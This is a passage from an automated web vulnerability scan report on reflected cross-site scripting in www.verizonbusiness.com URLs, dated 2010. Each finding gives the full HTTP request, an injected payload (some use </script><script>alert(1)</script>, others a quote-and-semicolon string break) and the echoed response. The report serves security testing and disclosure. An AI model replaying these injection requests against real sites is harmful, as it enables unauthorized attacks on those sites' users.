This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media58b15"%3b7510c4873f8/large-131367-customer+service+week.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40298
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media58b15";7510c4873f8/large-131367-customer+service+week.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MI
...[SNIP]...

1.796. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 123fe</script><script>alert(1)</script>054332bd3e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/large-131367-customer+service+week.xml123fe</script><script>alert(1)</script>054332bd3e3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "98e7ebd93d7c938e5c85f439f81a8c7a"
Last-Modified: Wed, 17 Nov 2010 00:04:55 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:04:55 GMT
Content-Length: 16718
Connection: close
Set-Cookie: BERT=VRID%3da4ce657b-1476-4289-8f31-d1918a86f46c|VTID%3d5b5ee289-2f17-4b07-a400-a961f5387f4b|SX%3d1289953495|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:08:39 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:04:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/media/large-131367-customer+service+week.xml123fe</script><script>alert(1)</script>054332bd3e3</url>
...[SNIP]...

1.797. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aca16'%3b7dc2f546387 was submitted in the REST URL parameter 1. This input was echoed as aca16';7dc2f546387 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesaca16'%3b7dc2f546387/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesaca16';7dc2f546387/media/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.798. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76b1b"%3bcf900c3a2cb was submitted in the REST URL parameter 1. This input was echoed as 76b1b";cf900c3a2cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources76b1b"%3bcf900c3a2cb/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources76b1b";cf900c3a2cb/media/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.799. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 849ef'%3bb7a8498e367 was submitted in the REST URL parameter 2. This input was echoed as 849ef';b7a8498e367 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media849ef'%3bb7a8498e367/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40268
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/media849ef';b7a8498e367/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.800. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fde55"%3b3e5e9e12e8f was submitted in the REST URL parameter 2. This input was echoed as fde55";3e5e9e12e8f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/mediafde55"%3b3e5e9e12e8f/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40268
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/mediafde55";3e5e9e12e8f/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.801. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e14d0</script><script>alert(1)</script>f09a4b3545 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/large-131421-mitsui.xmle14d0</script><script>alert(1)</script>f09a4b3545 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "84d6f9f091bfb97defbc17b4c241ec9d"
Last-Modified: Wed, 17 Nov 2010 00:05:36 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17252
Date: Wed, 17 Nov 2010 00:05:36 GMT
Connection: close
Set-Cookie: BERT=VRID%3da30b5fd1-b46b-49b1-a52b-6ce539af813e|VTID%3dffebfd47-c12f-4f72-ab82-f9be034fd5e9|SX%3d1289953536|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:09:20 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:05:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/media/large-131421-mitsui.xmle14d0</script><script>alert(1)</script>f09a4b3545</url>
...[SNIP]...

1.802. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6127"%3b6b388d8beb6 was submitted in the REST URL parameter 1. This input was echoed as e6127";6b388d8beb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese6127"%3b6b388d8beb6/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese6127";6b388d8beb6/media/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.803. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfb4d'%3b45f688c8adb was submitted in the REST URL parameter 1. This input was echoed as cfb4d';45f688c8adb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcescfb4d'%3b45f688c8adb/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcescfb4d';45f688c8adb/media/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.804. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a89"%3b94600298a34 was submitted in the REST URL parameter 2. This input was echoed as 35a89";94600298a34 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media35a89"%3b94600298a34/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:42 GMT
Content-Type: text/html
Content-Length: 40268
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media35a89";94600298a34/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.805. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa4ad'%3b62b12de13d0 was submitted in the REST URL parameter 2. This input was echoed as fa4ad';62b12de13d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/mediafa4ad'%3b62b12de13d0/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:57 GMT
Content-Type: text/html
Content-Length: 40268
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/mediafa4ad';62b12de13d0/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.806. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2949d</script><script>alert(1)</script>f38e035ba49 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/large-131513-mitsui.xml2949d</script><script>alert(1)</script>f38e035ba49 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "0491103df296fd929a20df935823abc4"
Last-Modified: Wed, 17 Nov 2010 00:05:20 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17215
Date: Wed, 17 Nov 2010 00:05:20 GMT
Connection: close
Set-Cookie: BERT=VRID%3d02413e2b-0f0c-4d06-8d2a-b2231ed696ba|VTID%3dc4ab117b-c51b-4d93-984e-65d7ed319752|SX%3d1289953520|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:09:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:05:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/media/large-131513-mitsui.xml2949d</script><script>alert(1)</script>f38e035ba49</url>
...[SNIP]...

1.807. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11aee'%3b288c8280f16 was submitted in the REST URL parameter 1. This input was echoed as 11aee';288c8280f16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources11aee'%3b288c8280f16/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
